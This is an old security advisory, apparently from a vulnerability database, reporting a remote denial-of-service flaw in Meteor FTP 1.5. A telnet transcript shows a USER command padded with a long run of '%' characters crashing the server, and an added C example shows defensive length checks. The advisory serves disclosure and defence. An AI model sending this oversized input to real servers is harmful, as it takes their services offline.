Remote denial of service vulnerability in Meteor FTP Version 1.5

Type securityvulns
Reporter Securityvulns
Modified 2003-08-10T00:00:00

Description August 8, 2003

Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

1. Introduction

Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.

2. Vulnerability

A vulnerability exists in Meteor FTP Version 1.5, which allows any malicious user to remotely cause a denial of service against the ftp server.

Connecting to the Meteor FTP server and issuing USER followed by a large amount of data crashes the ftp server.

3. Example

A proof-of-concept exploit is included in the attachment.

root@openwire # telnet 21
Trying
Connected to
Escape character is '^]'.
220 Service ready for new user
USER %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.
root@openwire # telnet 21
Trying
Connected to
Escape character is '^]'.
USER anonymous
QUIT
telnet> quit
Connection closed.

At this point the server has completely frozen up. On the server side, Meteor FTP spits out a dialog:

"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525), program terminated."

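Clicking "OK" terminates Meteor FTP. Note that 0x25 is the ASCII code for '%', so the value 0x25252525 in the dialog matches the bytes sent in the USER argument.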
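The advisory does not state the root cause. As a defensive illustration of handling the oversized USER argument shown above, the following added C example (not from the advisory and not Meteor FTP's code) checks the argument length before any copy and answers 501 instead. The function name handle_user and the 64-byte MAX_USER_LEN limit are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_USER_LEN 64  /* assumed policy limit; the advisory states none */

/* Validate one received FTP line as a USER command; copy the name into
 * `user` only if it fits. Returns the reply code to send: 331 (name ok,
 * need password), 501 (bad argument) or 500 (not a USER command). */
int handle_user(const char *line, size_t len, char *user, size_t user_sz)
{
    static const char verb[] = "USER";
    size_t i, arg_len;
    if (user_sz == 0)
        return 501;
    user[0] = '\0';

    /* Drop the trailing CRLF (or bare LF) before measuring anything. */
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;

    if (len < 4)
        return 500;
    for (i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return 500;
    if (len > 4 && line[4] != ' ')
        return 500;

    /* Check length before any copy: an oversized argument gets 501. */
    arg_len = len > 5 ? len - 5 : 0;
    if (arg_len == 0 || arg_len > MAX_USER_LEN || arg_len >= user_sz)
        return 501;
    for (i = 0; i < arg_len; i++)
        if (!isprint((unsigned char)line[5 + i]))
            return 501;

    memcpy(user, line + 5, arg_len);
    user[arg_len] = '\0';
    return 331;
}

int main(void)
{
    char user[MAX_USER_LEN + 1], big[400] = "USER ";  /* constructed input */
    memset(big + 5, '%', 320);  /* oversized argument like the advisory's */
    printf("%d\n", handle_user("USER anonymous\r\n", 16, user, sizeof user));
    printf("%d\n", handle_user(big, strlen(big), user, sizeof user));
    return 0;
}
```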

4. Vendor status

Vendor has been notified, waiting for response...

5. Credits

Vulnerability & code by zerash
You can view this advisory at :
You can view the exploit at :

6. Contact

Please send suggestions, updates, and comments to :